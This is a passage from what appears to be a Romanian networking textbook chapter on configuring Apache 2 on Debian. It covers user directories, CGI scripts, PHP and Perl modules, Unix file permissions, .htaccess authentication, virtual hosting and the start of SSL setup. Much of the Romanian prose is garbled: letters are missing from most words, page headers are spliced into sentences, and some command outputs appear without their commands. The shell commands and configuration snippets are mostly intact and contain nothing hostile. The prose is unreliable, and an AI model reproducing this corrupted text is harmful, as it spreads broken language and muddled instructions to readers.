ragnarok:/etc/apache2/mods-enabled# ln -s ../mods-available/userdir.conf userdir.conf
ragnarok:/etc/apache2/mods-enabled# ln -s ../mods-available/userdir.load userdir.load
ragnarok:/etc/apache2/mods-enabled# apache2ctl restart
C ea ea a uală a legătu ilo si oli e este destul de difi ilă şi sus epti ilă la e o i.
“oluţia e o a dată este folosi ea s iptu ilo a2enmod şi a2dismod oferite de Debian pentru
activarea, respectiv dezactivarea modulelor din server:
ragnarok:~# a2dismod userdir
Module userdir disabled; run /etc/init.d/apache2 force-reload to fully disable.

ragnarok:~# a2enmod userdir
Module userdir installed; run /etc/init.d/apache2 force-reload to enable.
Serverul trebuie repo it pe t u î ă a ea odulului.

Co figu aţia pe t u odulul UserDir se află î /etc/apache2/mods-
available/userdir.conf:
ragnarok:~# cat /etc/apache2/mods-available/userdir.conf
UserDir public_html
UserDir disabled root
<Directory /home/*/public_html>
AllowOverride FileInfo AuthConfig Limit
Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
</Directory>
</IfModule>
Ca de obicei, directivele de configurare sunt încadrate de directiva IfModule.

Directiva
UserDir public_html
p e izează a webroot pentru fiecare utilizator directorul local public_html. Posibilitatea

pu li ă ii de do u e te di t -u di e to p op iu de utilizato ul p i ilegiat este deza ti ată:
Opţiu ile pe t u di e to su t date de di e ti a Directory:
<Directory /home/*/public_html>
Câmpul * este înlocuit cu numele utilizatorului.

Astfel, directorul webroot local al utilizatorului andrei folosit pentru publicarea de
resurse prin intermediul serverului web este /home/andrei/public_html.
A esa ea di e to ului e oot lo al se ealizează p i i te ediul u ui U‘L de fo a
http://www.example.com/~andrei/. Astfel, accesul la pagina /home/andrei/public_html/
pub/file.html se ealizează p i i te ediul URL-ului http://localhost/~andrei/
pub/file.html.
Ca u e e iţiu, se presupune ă e istă u set de utilizato i a e au di e to ul home în
/home/students/username, unde username este numele utilizatorilor. Administratorul de
siste de ide ă şi utilizato i o putea pu li a do u e te e . Î a eastă situaţie
o figu aţia odulului UserDir va fi:
[…]
<Directory /home/students/*/public_html>
AllowOverride FileInfo AuthConfig Limit
Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
</Directory>
</IfModule>
Co figu aţia a fost adăugată la o figu aţia a te ioa ă. “e e ul e t e uie epo it

pe t u a î ă a odifi ă ile efe tuate.
“e o se ă ă s-au stabilit proprietăţile pe di e to ul /home/students/*/public_html,
unde * a fi î lo uit u u ele utilizato ului. Astfel, da ă utilizato ul diana are directorul
home în /home/students/diana, folosirea URL-ului http://localhost/~diana/
docs/chapter.doc a o du e la o ţi e ea fişie ului /home/students/diana/public_html/
docs/chapter.doc.
9.2.3.2.4 Configurare CGI

CGI (Common Gateway Interface este u p oto ol a e pe ite i te faţa ea î t e o
apli aţie şi u se e e . A est lu u pe ite t a s ite ea e e ilo de la lie ţi ăt e
apli aţie. După ula ea apli aţiei, se e ul e a î toa e ezultatul a esteia ăt e lie t.
322 | ‘ e ţ e l e L o a l e
Un program CGI este specificat prin intermediul unui URL, spre exemplu
http://www.example.com/simple.cgi. Folosirea acestui URL impune serverului web rularea
p og a ului aso iat. “e e ul e ole tează ezultatul ulă ii p og a ului şi îl t a s ite
lie tului. A est lu u a e deza a tajul ulă ii u ui p o es sepa at pe t u fie a e i sta ţă de
e e e. O soluţie este folosi ea de odule p e u mod_php sau mod_perl [vezi 9.2.3.3] care
pe it i teg a ea u ui i te p eto î se e ul e . O altă soluţie este folosi ea de li aje de
p og a a e p e u C a e pot ati ge o efi ie ţă ai a e p i te i a ea ai apidă a
e e uţiei.
“upo tul de CGI pe t u Apa he este o ţi ut p i i te ediul odulului mod_cgi. Întrucât
nu este activat implicit, trebuie activat manual:
ragnarok:~# a2enmod cgi
Module cgi installed; run /etc/init.d/apache2 force-reload to enable.
ragnarok:/etc/apache2/mods-enabled# apache2ctl restart
Co figu a ea di e to ului e o ţi e s iptu ile CGI se ealizează la i el de do e iu

i tual. Astfel, o figu aţia CGI pe t u do e iul i tual i pli it este:
NameVirtualHost *
<VirtualHost *>
[...]
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>
[...]
</VirtualHost>
Directorul de unde se vor executa scripturile CGI este definit prin intermediul directivei
ScriptAlias şi este, i pli it, /usr/lib/cgi-bin/. Accesul la scriptul /usr/lib/cgi-
bin/sample.cgi se ealizează p i i te ediul u ui U‘L de fo a http://localhost/cgi-
bin/script.cgi. Opţiu ea ExecCGI este ea a e spe ifi ă se e ului e e uţia s iptului p i
i te ediul u ei apli aţii e te e.
U s ipt si plu CGI este u ăto ul program C:
ragnarok:~# cat sample.c
#include <stdio.h>
int main (void)
{
printf ("Content-type: text/html\n\n");
printf (
"<html>\n"
"\t<head>\n"
"\t\t<title>Pagina mea</title>\n"
"\t</head>\n"
"\t<body>\n"
"\t\t<h1>Hello, World!</h1>\n"
"\t</body>\n"
"</html>\n"
);
return 0;
}
ragnarok:~# gcc -Wall sample.c -o sample.cgi
ragnarok:~# mkdir /usr/lib/cgi-bin/
ragnarok:~# cp sample.cgi /usr/lib/cgi-bin/
Programul C a fost compilat, numele executabilului fiind sample.cgi; extensia .cgi este
opţio ală. E e uta ilul a fost opiat î /usr/lib/cgi-bin. Întrucât directorul nu exista
anterior a fost creat.
Pentru testare putem folosi telnet sau netcat:
ragnarok:~# telnet localhost 80
Trying 127.0.0.1...
GET /cgi-bin/sample.cgi HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 23 Sep 2007 14:02:19 GMT
Server: Apache/2.2.3 (Debian)
Content-Length: 102
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Pagina mea</title>
</head>
<body>
<h1>Hello, World!</h1>
</body>
</html>
Ce e ea t i isă se e ului a fost GET /cgi-bin/sample.cgi HTTP/1.0. Serverul trimite

a ăspu s lie tului esajul HTTP/1.1 200 OK î p eu ă u u a tet de esaj şi pagi a e
ezultată p i ula ea s iptului CGI.
9.2.3.3 Instalare module

Alte module pot fi instalate cu ajutorul utilitarului apt-get. Pachetele asociate modulelor
Apache sunt denumite libapache2-mod-nume, unde nume ide tifi ă odulul. O listă a
modulelo i stala ile Apa he poate fi o ţi ută u ajuto ul o e zii apt-cache:
ragnarok:/etc/apache2# apt-cache search libapache2-mod-
libapache2-mod-auth-kerb - apache2 module for Kerberos authentication
libapache2-mod-auth-pam - module for Apache2 which authenticate using PAM
[...]
libapache2-mod-bt - BitTorrent tracker for the Apache2 web server
libapache2-mod-chroot - run Apache in a secure chroot environment
libapache2-mod-musicindex - Browse, stream, download and search through MP3/Ogg/FLAC
files
[...]
libapache2-mod-perl2 - Integration of perl with the Apache2 web server
libapache2-mod-python - Apache 2 module that embeds Python within the server
libapache2-mod-ruby - Embedding Ruby in the Apache2 web server
libapache2-mod-php4 - server-side, HTML-embedded scripting language (apache 2 module)
libapache2-mod-php5 - server-side, HTML-embedded scripting language (apache 2 module)
Pentru exemplificare se vor instala modulele mod_php5 şi mod_perl2 care permit rularea
de scripturi PHP sau Perl prin intermediul serverului web.
9.2.3.3.1 mod_php
“upo tul PHP se o ţi e p i i te ediul odulului mod_php5:
ragnarok:~# apt-get install libapache2-mod-php5
apache2-mpm-prefork php5-common
Suggested packages:
php-pear
The following packages will be REMOVED:
apache2-mpm-worker
apache2-mpm-prefork libapache2-mod-php5 php5-common
[...]
Se o se ă ă se î lo uieşte odulul de threading worker cu modulul prefork. Modulul

este automat activat după i stala e:
ragnarok:~# ls /etc/apache2/mods-enabled/php5.*
/etc/apache2/mods-enabled/php5.conf /etc/apache2/mods-enabled/php5.load
Fişie ul de o figu a e php5.conf defi eşte e te siile de fişie e pe t u a e a fi utilizat

modulul:
324 | ‘ e ţ e l e L o a l e
ragnarok:~# cat /etc/apache2/mods-enabled/php5.conf

<IfModule mod_php5.c>
AddType application/x-httpd-php .php .phtml .php3
AddType application/x-httpd-php-source .phps
</IfModule>
Pe t u testa e folosi fişie ul test.php de mai jos:

ragnarok:~# cat test.php
<?php
phpinfo ();
?>
ragnarok:~# cp test.php /var/www/
Folosirea URL-ului http://localhost/test.php du e la afişa ea u ei pagi i de i fo aţii

despre PHP.
9.2.3.3.2 mod_perl
Suportul Perl se o ţi e p i i stala ea odulului mod_perl2:
ragnarok:~# apt-get install libapache2-mod-perl2
La fel ca modulul mod_php5, mod_perl2 este auto at adăugat la lista de odule

î ă ate. Pe t u î ă a ea odulului t e uie epo it se e ul.
ragnarok:~# apache2ctl restart
U fişie de test este u ăto ul:

ragnarok:~# cat test.pl
#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
print "Hello, World!\n";
Scripturile Perl sunt folosite ca scripturi CGI. Pentru aceasta, scriptului Perl test.pl îi sunt
a o date d eptu i de e e uţie, după a e este opiat î /usr/lib/cgi-bin/:
ragnarok:~# chmod a+x test.pl
ragnarok:~# cp test.pl /usr/lib/cgi-bin/
9.2.3.4 Co figurare drepturi î siste ul de fişiere

Două di e ti e di fişie ul de o figu a e p e izează utilizato ul şi g upul di siste ul de
operare folosite de serverul Apache pentru accesarea resurselor web: User şi Group definite în
fişie ul p i ipal de o figu a e:
User www-data
Group www-data
Da ă utilizato ul www-data u a e d eptu i sufi ie te pe esu sa e ută atu i u se e ul

îi va returna un mesaj de tip Forbidden. De o i ei, u fişie a t e ui să ofe e d eptu i de
acces de citire utilizatorului www-data pe t u a a esta să poată fi t a s is lie tului. D eptul
de s ie e este e esa pe t u upload de fişie e şi este folosit ai a ; u e e plu de utiliza e
a dreptului de scriere este un wiki.
Î ai te de a p eze ta odul î a e se e ul e i te a ţio ează u d epturile pe sistemul
de fişie e, o fi reamintite mecanismele de drepturi de acces pe un sistem Unix.
9.2.3.4.1 Recapitulare drepturi Unix

După u se ştie, u siste U i a e t ei tipuri de drepturi:
 citire (read – : u fişie poate fi izualizat şi se poate lista o ţi utul u ui di e to ;
 scriere (write – : u fişie poate fi editat şi se pot ea oi i t ă i î t -u di e to ; i t ă ile î
siste ul de fişie e pot fi şte se;
 e e uție (execute – : u fişie poate fi e e utat şi u di e to poate fi pa te a u ei ăi;

i fo al spus, se poate „t e e p i t -un director.
O i e utilizato poate a ea o i a e di a este d eptu i de a es asup a u ei i t ă i î
siste ul de fişie e. Pe t u o gestiu e ai fa ilă, u fişie a e g upat utilizato ii î t ei atego ii:
 user u : utilizato ul a e deţi e fişie ul
 group g : g upul a e deţi e fişie ul
 other o : eilalţi utilizato i
“ hi a ea utilizato ului sau g upului a e deţi e fişie ul se ealizează u ajuto ul
comenzii chown.
Fie a e di a este t ei atego ii au aso iate d eptu i de iti e, s ie e şi e e uţie. De o i ei
d eptu ile pe u fişie su t date p i o ate a ea d eptu ilo pe t u e tităţile de ai sus.
Astfel gruparea de drepturi rwx r-x –wx î sea ă ă utilizato ul a e toate d eptu ile asup a
fişie ului, g upul a e d eptu i de iti e şi e e uţie, ia eilalţi au d ept de s ie e şi e e uţie.
D eptu ile de a es pe o i t a e di siste ul de fişie e se izualizează u ajuto ul o e zii
ls –l:
ragnarok:~# ls -l
total 49
drwx------ 24 root root 792 Feb 24 2007 dir
drwxr-xr-x 2 root root 152 May 31 11:55 Desktop
-rw-r--r-- 1 root root 179 Nov 14 2006 dbootstrap_settings
---------- 1 root root 6 Jan 21 2007 huhu
-rw-r--r-- 1 root root 1336 Nov 14 2006 install-report.template
-rw------- 1 root root 2006 Nov 14 2006 mbox
-rwxr-xr-x 1 root root 7158 Sep 23 17:01 sample.cgi
În listing se o se ă ă utilizato ul a e deţi e i t ă ile este root, ia g upul deţi ăto este
tot root. Utilizatorul root a e toate d eptu ile pe fişie ul dir, ia g upul şi eilalţi utilizato i u
au niciun d ept. Fişie ul sample.cgi poate fi e e utat de ăt e o i e utilizato , a â d d ept de
e e uţie pe t u utilizato , g up şi eilalţi.
Î şi ui ea de d eptu i asup a u ei i t ă i î siste ul de fişie e poate fi folosită î fo at
binar, asociindu-se iţi: âte u it pe t u p eze ţa sau u a u ui d ept. Astfel, fo atul
literal rwx r-x –wx are asociat formatul binar 111 101 011. “e p efe ă fo atul o tal al
drepturilor, care pentru exemplul anterior este 753.
D eptu ile pe o i t a e î siste ul de fişie e pot fi alte ate folosi d o a da chmod. În
ele e u ează se vor prezenta mai multe exemple de rulare a chmod pentru schimbarea
su esi ă a d eptu ilo de a es pe fişie e:
 toate drepturile pentru utilizator, niciun d ept pe t u eilalţi
ragnarok:~# ls -l test.txt
-rw-r--r-- 1 root root 0 Sep 23 19:23 test.txt
ragnarok:~# chmod 700 test.txt
-rwx------ 1 root root 0 Sep 23 19:23 test.txt
 d ept de iti e şi s ie e pe t u utilizato , d ept de iti e pe t u g up, d ept de s ie e pe t u

eilalţi
-rw-r---w- 1 root root 0 Sep 23 19:23 test.txt
 d ept de iti e şi e e uţie pe t u utilizato , d ept de iti e şi s ie e pe t u g up, d ept de

s ie e şi e e uţie pe t u eilalţi
-r-xrw--wx 1 root root 0 Sep 23 19:23 test.txt
 e e i ea la d eptu ile i iţiale: d ept de iti e şi s ie e pe t u utilizato , d ept de iti e pe t u

g up şi pe t u eilalţi
326 | ‘ e ţ e l e L o a l e
-rw-r--r-- 1 root root 0 Sep 23 19:23 test.txt
9.2.3.4.2 Configurare drepturi server web

După u s-a p e izat, pe t u a o esu să să poată fi a esată de se e ul e , t e uie a
utilizatorul sau grupul www-data să ai ă d ept de iti e asup a a esteia.
Fie u ătoa ea situaţie:
ragnarok:/var/www# ls -l
total 0
-rw-r--r-- 1 root root 0 Sep 23 19:32 brad.txt
-rw-r----- 1 root root 0 Sep 23 19:32 fag.txt
Fişie ul brad.txt a putea fi a esat de se e ul e , î ti p e fişie ul fag.txt.

Utilizatorul www-data fa e pa tea di atego ia de utilizato i othe s, adi ă ulti ele d eptu i.
În cazul brad.txt aceste drepturi sunt r-- iar în cazul fag.txt sunt --- (niciun drept).
Da ă se s hi ă grupul pentru fag.txt în www-data, atu i şi a esta a putea fi a esat
de serverul web:
ragnarok:/var/www# chown root:www-data fag.txt
ragnarok:/var/www# ls -l
total 0
-rw-r--r-- 1 root root 0 Sep 23 19:32 brad.txt
-rw-r----- 1 root www-data 0 Sep 23 19:32 fag.txt
Se va adăuga u di e to la st u tu a deja e iste tă:

ragnarok:/var/www# mkdir carpen
ragnarok:/var/www# touch carpen/molid.txt
ragnarok:/var/www# touch carpen/frasin.txt
ragnarok:/var/www# ls -ld carpen/
drwxr-xr-x 2 root root 112 Sep 23 19:47 carpen/
ragnarok:/var/www# ls -l carpen/
total 0
-rw-r--r-- 1 root root 0 Sep 23 19:47 frasin.txt
-rw-r--r-- 1 root root 0 Sep 23 19:47 molid.txt
Directorul carpen/ ofe ă d eptu i de iti e şi e e uţie pe t u eilalţi utilizato i astfel ă se

poate afişa o ţi utul său. D ept u a e, folosi ea U‘L-ului http://localhost/carpen/ va
o du e la lista ea o ţi utului a estui di e to . Fişie ele frasin.txt şi molid.txt pot fi
accesate prin intermediul pagi ii afişate. Da ă se s hi ă d eptu ile pe u fişie :
ragnarok:/var/www# chmod 640 carpen/molid.txt
atunci utilizatorul www-data u a ai a ea d ept de iti e. Fişie ul a fi totuşi afişat î

momentul folosirii URL-ului http://localhost/carpen/, dar nu va putea fi accesat. Cu alte
u i te s hi a ea d eptu ilo de a es pe u fişie u s hi ă o po ta e tul di e to ului
a e îl o ţi e.
Lista ea di e to ului este deza ti ată da ă e istă u fişie i de ezi 9.2.3.2 . Astfel, da ă
se eează fişie ul index.html, se a fa e i pli it afişa ea a estuia, u a o ţi utului
directorului.
ragnarok:/var/www# touch carpen/index.html
Fişie ele frasin.txt şi molid.txt o putea fi efe ite, î a est az, u ai da ă li se

u oaşte alea o pletă. Altfel spus, o putea fi e upe ate u ajuto ul U‘L-urilor
http://localhost/carpen/frasin.txt, respectiv http://localhost/carpen/molid.txt.
De ulte o i se do eşte deza ti a ea listă ii o ţi utul u ui di e to fă ă a fi e oie de
p eze ţa u ui fişie index.html. Pentru aceasta trebuie eliminat dreptul de citire de director,
da păst at el de e e uţie de pa u ge e a di e to ului :
ragnarok:/var/www# chmod 711 carpen/
După o a da de ai sus, utilizato ul www-data va avea doar d ept de e e uţie asup a

directorului carpen/. Da ă a est di e to a o ţi e u fişie i de , a esta a fi afişat. Altfel se
a afişa u esaj de tip Forbidden. Fişie ele di t -un astfel de director pot fi accesate doar
p i p e iza ea ăii o plete î URL.
9.2.3.5 Co figurare opțiu i per dire tor. Fişierul .hta ess

Di e toa ele a esi ile p i i te ediul se e ului e pot a ea aso iate opţiu i p i
i te ediul u ui fişie e iste t î a est di e to . A est fişie poa tă u ele de .htaccess1.
P eze ţa a estui fişie î t -u di e to î sea ă pa u ge ea a estuia şi i te p eta ea
directivelor existente pentru acel director.
Fişie ul .htaccess este folosit atu i â d u utilizato u a e a es la fişie ul p i ipal de
o figu a e. Î azul î fişie ul p i ipal de configurare poate fi folosit pentru a configura un
di e to , se e o a dă să u se foloseas ă fişie ul .htaccess. Opţiu ile pe di e to su t
o figu ate î fişie ul p i ipal u ajuto ul di e ti ei <Directory>.
Co figu aţiile di .htaccess sunt aplicate di e to ului u e t şi tutu o su di e toa elo
a estuia. Co figu aţiile di fişie ele .htaccess di su di e toa e o sup as ie o figu ă ile
din directorul curent. Directiva AllowOverride des isă î se ţiu ea 9.2.3.1 este folosită
pe t u a p e iza di e ti ele di fişie ul p i ipal de o figu a e pe a e fişie ul .htaccess le
poate suprascrie. Astfel, folosirea
AllowOverride None
ig o ă p eze ţa fişie ului .htaccess, pe când folosirea

AllowOverride All
acordă p io itate di e ti elo p eze te î fişie ul .htaccess.

Un exemplu este configurarea unui director pentru a rula scripturi CGI. Pentru aceasta
fişie ul .htaccess a a ea o ţi utul:
ragnarok:~# cat /var/www/test/.htaccess
Options +ExecCGI
SetHandler cgi-script
Pe t u a a este o figu ă i să fie a ti e, a t e ui a di e to ul /var/www/test să

pe ită di e ti ele de o figu a e Options şi FileInfo:
NameVirtualHost *
<VirtualHost *>
[...]
<Directory /var/www/test/>
AllowOverride Options FileInfo
</Directory>
[...]
</VirtualHost>
După a easta folosi ea U‘L-ului http://localhost/test/sample.cgi va conduce la

e e uţia s iptului sample.cgi.
9.2.3.5.1 Folosire directive de autentificare

Fişie ul .htaccess poate fi folosit pentru autentificarea utilizatorului în momentul în care
a esează di e to ul aso iat2. Ca şi alte opţiu i, se e o a dă utiliza ea di e ti elo de
autentificare în cadrul unei directive Directory într-u fişie de o figu a e. Folosi ea a esto
directive într-u fişie .htaccess se foloseşte î o e tul î a e u se poate a esa fişie ul
de configurare.
1
http://httpd.apache.org/docs/2.2/howto/htaccess.html
2
http://httpd.apache.org/docs/2.2/howto/auth.html
328 | ‘ e ţ e l e L o a l e
U e e plu de o figu a e este u ăto ul:

ragnarok:~# mkdir /var/www/need_auth
ragnarok:~# vi /var/www/need_auth/.htaccess
ragnarok:~# cat /var/www/need_auth/.htaccess
AuthType Basic
AuthName "Authentication Needed"
AuthUserFile /var/www/need_auth_passwd
Require user mihai roxana
Tipul de autentificare folosit este Basic. Directiva AuthName defi eşte do eniul (Realm)
u a e a fi aso iată i sta ţa u e tă de aute tifi a e. Aute tifi a ea foloseşte fişie ul
precizat prin intermediul directivei AuthUserFile, î azul de faţă
/var/www/need_auth_passwd. Directiva Require spe ifi ă odul î a e se ealizează
aute tifi a ea. Î azul de faţă se pe ite a esul u ai utilizato ilo mihai şi roxana.
C ea ea şi o pleta ea fişie ului de o figu a e se ealizează u ajuto ul utilita ului
htpasswd. Astfel, pe t u ea ea fişie ului şi adăuga ea utilizato ilo mihai şi roxana se
foloseşte se e ţa de o e zi de ai jos:
ragnarok:~# htpasswd -c /var/www/need_auth_passwd mihai
New password:
Re-type new password:
Adding password for user mihai
ragnarok:~# htpasswd /var/www/need_auth_passwd roxana
New password:
Re-type new password:
Adding password for user roxana
La prima rulare s-a folosit opţiu ea –c pe t u a ea fişie ul de pa ole. Pa olele su t

iptate î fişie ul de aute tifi a e:
ragnarok:~# cat /var/www/need_auth_passwd
mihai:nzXO9vzU9BcmA
roxana:uJOLmQIETpCZw
Pe t u a putea folosi di e ti ele de aute tifi a e di fişie ul .htaccess a t e ui folosită

directiva AllowOverride u opţiu ea AuthConfig:
<Directory /var/www/need_auth/>
AllowOverride AuthConfig
</Directory>
Folosirea URL-ului http://localhost/need_auth/ a du e la apa iţia u ui p o pt de

aute tifi a e a utilizato ului. Utilizato ul se a putea aute tifi a u u ele de utilizato şi
pa ola spe ifi ate î fişie ul /var/www/need_auth_passwd, î azul de faţă mihai şi roxana şi
pa olele aso iate. După aute tifi a e a putea a esa esu sele di di e to .
9.2.4 Găzduire virtuală

U a di t e ele ai i po ta te fa ilităţi î Apa he este posi ilitatea de găzduire irtuală
(virtual hosting)1. A tual e te, a easta este etoda fu da e tală de a rula mai multe servicii
web - fie a e u u e şi U‘L-uri diferite - da a e ep ezi tă site-uri distincte. Virtual hosting
este folosit pe s a ă la gă î I“P-u i și site-uri de hosting a e au e oie să ad i ist eze ai
multe site-u i, da u o să a hiziţio eze u al ulato ou pe t u fie a e î pa te.
9.2.4.1 Tipuri de găzduire irtuală

E istă două odu i de a i ple e ta găzdui ea i tuală a pagi ilo e : găzduire irtuală
azată pe adrese IP (IP-based virtual hosting şi găzduire irtuală azată pe ume (name-
based virtual hosting). Un caz particular poate fi considerat găzduirea irtuală azată pe port.
1
http://httpd.apache.org/docs/2.2/vhosts/
Î ad ul găzdui ii azate pe ad ese IP, fie a e virtual host p i eşte o ad esă IP. Pe
anumite sisteme de operare se pot stabili mai multe adrese IP pe o i te faţă de eţea. Pe alte
siste e a fi e oie de o i te faţă supli e ta ă pe t u fie a e ad esă IP.
Totuşi, ad esele IP ostă şi su t di e î e ai g eu de o ţi ut, astfel î ât browser-ele
moderne pot folosi virtual hosting bazat pe nume. Când u se e e p i eşte o o e iu e
u u oaşte e u e de staţie hostname) a fost folosit în URL. Pentru a corecta, noua
spe ifi aţie HTTP/ . adaugă o fa ilitate p i i te ediul ă eia browser-ele pot spune
serverului ce hostname folosesc, prin intermediul antetului Host:.
Deşi găzdui ea i tuală p ezi tă a a tajul e o o isi ii de ad ese IP, t e uie ţi ut o t de
e iste ţa u o browser-e ai e hi a e u au i ple e tată spe ifi aţia HTTP/ . . Da ă u
astfel de browser se o e tează la u se e e u găzdui e i tuală azată pe u e, u a
trimite antetul Host:, aşa ă se e ul a t e ui să ăspu dă u o listă de gazde i tuale
posibile.
9.2.4.2 Alegerea u elui de stație

După sta ili ea tipului de găzdui e i tuală do it şi, e e tual, a u ei ad ese IP, t e uie ales
u u e de staţie şi a tualizat o espu zăto se e ul DN“ aso iat.
Se presupune ă se e ul e as ultă o e iu i pe două ad ese IP: 99.88.77.66 şi
88.77.66.55. Î a elaşi ti p a folosi găzdui e i tuală azată pe ad ese IP şi să as ulte
folosească do e iile www1.mydomain.com şi www2.mydomain.com. În acest caz trebuie
adăugate două i t ă i î fişie ul de o figu a e DN“ a ele de ai jos. S-a p esupus ă
serverul de nume configurat este autoritar pe domeniul mydomain.com:
www1 A 99.88.77.66
www2 A 88.77.66.55
Da ă se do eşte folosi ea găzdui i i tuale azate pe u e folosi d a ad esă IP doa

99.88.77.66 atunci vor exista două i t ă i de fo a
www1 A 99.88.77.66
www2 CNAME www1
O situaţie pa ti ula ă, folosită la testa e, este găzdui ea i tuală azată pe u e u a es

u ai de pe siste ul lo al. Pe t u a easta este e oie de adăuga ea î /etc/hosts a unei
linii de forma:
127.0.0.1 www.mydomain.com
9.2.4.3 Co figurare găzduire irtuală î Apa he

După u s-a spe ifi at şi î se ţiu ea 9.2.3, o figu a ea găzdui ii i tuale î Apa he se
ealizează, pe De ia /U u tu, p i i te ediul di e toa elo /etc/apache2/sites-
available şi /etc/apache2/sites-enabled/. Directorul sites-available/ o ţi e âte
un fişie pe t u fie a e do e iu i tual pote ţial. Di e to ul sites-enabled/ o ţi e legătu i
si oli e ăt e fişie ele di sites-available/ precizând, astfel, domeniile virtuale care sunt
activate la rularea serverului.
I iţial, Apa he a e o figu at u do eniu virtual implicit în /etc/apache2/sites-
available/000-default:
ragnarok:~# ls -l /etc/apache2/sites-enabled/000-default
lrwxrwxrwx 1 root root 36 Sep 23 00:06 /etc/apache2/sites-enabled/000-default ->
/etc/apache2/sites-available/default
Pentru configu a ea u ui do e iu i tual se eează u fişie î sites-available/, după

a e se eează o legătu ă si oli ă î sites-enabled/. “e e o a dă u u ele fişie ului să
fie hia u ele do e iului pe t u a e se ealizează găzdui ea i tuală. Pe t u a ti a ea şi
330 | ‘ e ţ e l e L o a l e
deza ti a ea do e iilo i tuale se e o a dă folosi ea s iptu ilo a2ensite, respectiv

a2dissite puse la dispoziţie de pa hetul de la De ia .
9.2.4.3.1 Dire tive pe tru găzduire virtuală

Î ai te de p eze ta ea u ui e e plu de o figu a e glo ală, se vor identifica o parte din
di e ti ele de o figu a e pe t u găzdui e i tuală folosi d do e iul i pli it:
NameVirtualHost *
<VirtualHost *>
DocumentRoot /var/www/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
AllowOverride None
Order allow,deny
allow from all
</Directory>
[...]
</VirtualHost>
Di o ţi utul fişie ului s-au păst at doa di e ti ele folosite pe t u o figu a ea găzdui ii
virtuale. Di e ti ele de o figu a e pe t u găzdui ea i tuală su t:
 NameVirtualHost i di ă folosi ea găzdui ii i tuale; e o a da ea1 pe t u găzdui ea
i tuală azată pe u e este ea ea u ui fişie /etc/apache2/conf.d/virtual.conf
a e să o ţi ă opţiu ea NameVirtualHost u ată de ad esa IP folosită pe t u găzdui e
i tuală; a a te ul * î sea ă ă se e ul as ultă pe toate i te feţele;
 <VirtualHost *> defi eşte u do e iu i tual; î azul î a e se foloseşte găzdui e i tuală
se foloseşte a elaşi pa a et u a şi la NameVirtualHost, î azul de faţă *;
 ServerAdmin defi eşte ad esa de e-mail a administratorului domeniului;
 DocumentRoot defi eşte di e to ul ădă i ă pe t u do e iul i tual o figu at;
 directiva ServerName este o di e ti ă ese ţială a e defi eşte domeniul pentru care a fost
configurat virtual host-ul;
 ServerAlias poate spe ifi a u u e de do e iu a e să fie dese it de a elaşi i tual host.
9.2.4.3.2 Găzduire virtuală azată pe u e

Pe t u a ti a ea găzdui ii i tuale se foloseşte di e ti a NameVirtualHost. Da ă se
do eşte a se e ul să se eas ă e e i pe t u toate i te feţele se foloseşte î fo a
NameVirtualHost *
Pe t u a p ofita de odula itatea Apa he , se e o a dă a a eastă di e ti ă să fie

e t asă di fişie ul de o figu a e pe t u do e iul i pli it şi opiată î fişie ul de o figu a e
/etc/apache2/conf.d/virtual.conf, i lus î fişie ul p i ipal de o figu aţie:
ragnarok:~# cat /etc/apache2/conf.d/virtual.conf
NameVirtualHost *
Pentru crearea unui virtual host, două di e ti e su t i dispe sabile: ServerName şi

DocumentRoot. A este două di e ti e defi es , espe ti , u ele do e iului i tual gestio at
şi do u e tul ădă i ă folosit pe t u pu li a ea de esu se.
Astfel, un virtual host simplu este:
<VirtualHost *>
ServerName www.domain.com
DocumentRoot /usr/local/www
1
http://www.debian-administration.org/articles/412
</VirtualHost>
Directiva ServerName lipseşte i iţial di fişie ul de o figu a e aso iat do e iului i pli it
pe t u ă a esta a ăspu de pe t u toate e e ile pe t u a e u e istă u virtual host
asociat.
Do i să se o figu ează u ătoa ele do e ii:
 www.domain.com u ădă i a î /usr/local/www
 www.test.com u ădă i a î /var/www/test
Se va presupune un caz de test, drept pentru care domeniile de mai sus vor fi asociate
adresei locale 127.0.0.1 prin intermediul fişie ului /etc/hosts:
127.0.0.1 www.domain.com
127.0.0.2 www.test.com
Pe t u fie a e di t e ele două do e ii se vor crea două fişie e u u ele

www.domain.com, respectiv www.test.com în /etc/apache2/sites-available:
ragnarok:~# cat /etc/apache2/sites-available/www.domain.com
<VirtualHost *>
ServerName www.domain.com
ServerAlias domain.com
DocumentRoot /usr/local/www
</VirtualHost>
ragnarok:~# cat /etc/apache2/sites-available/www.test.com
<VirtualHost *>
ServerName www.test.com
ServerAlias test.com
DocumentRoot /var/www/test
</VirtualHost>
Directiva ServerAlias pe ite spe ifi a ea u ui do e iu a e să efe e a elaşi di e to

ădă i ă.
Pentru activarea domeniilor folosim utilitarul a2ensite:
ragnarok:~# a2ensite www.domain.com
Site www.domain.com installed; run /etc/init.d/apache2 reload to enable.
ragnarok:~# a2ensite www.test.com
Site www.test.com installed; run /etc/init.d/apache2 reload to enable.
“e e ul a t e ui epo it pe t u a ti a ea o figu aţiilor:

Ve ifi a ea o figu aţiilo se ealizează p i i te ediul u ui browser. Se poate folosi unul

î li ie de o a dă, u este lynx:
ragnarok:~# lynx http://www.domain.com
ragnarok:~# lynx http://www.test.com
9.3 Configurare suport SSL pentru Apache

Deoa e e p oto olul HTTP u este u p oto ol sigu , î ulte situaţii se do eşte folosi ea
p oto olului HTTP“, o ţi ut p i sup apu e ea HTTP peste ““L/TL“. I ple e tă ile u e te
folosesc SSLeay/OpenSSL prin intermediul pachetului openssl pe t u a asigu a o o u i aţie
sigu ă.
Paşii a e t e uie u aţi pe t u o figu a ea supo tului ““L pe t u Apa he su t
p eze taţi î o ti ua e.
9.3.1 Activare modul. Configurare Port

P i ul pas al o figu ă ii supo tului ““L peste Apa he este a ti a ea modulului mod_ssl.
Modulul este i stalat i pli it la i stala ea se e ului şi t e uie doa a ti at. Pe t u a ti a e
folosim scriptul a2enmod:
ragnarok:~# a2enmod ssl
Module ssl installed; run /etc/init.d/apache2 force-reload to enable.
332 | ‘ e ţ e l e L o a l e
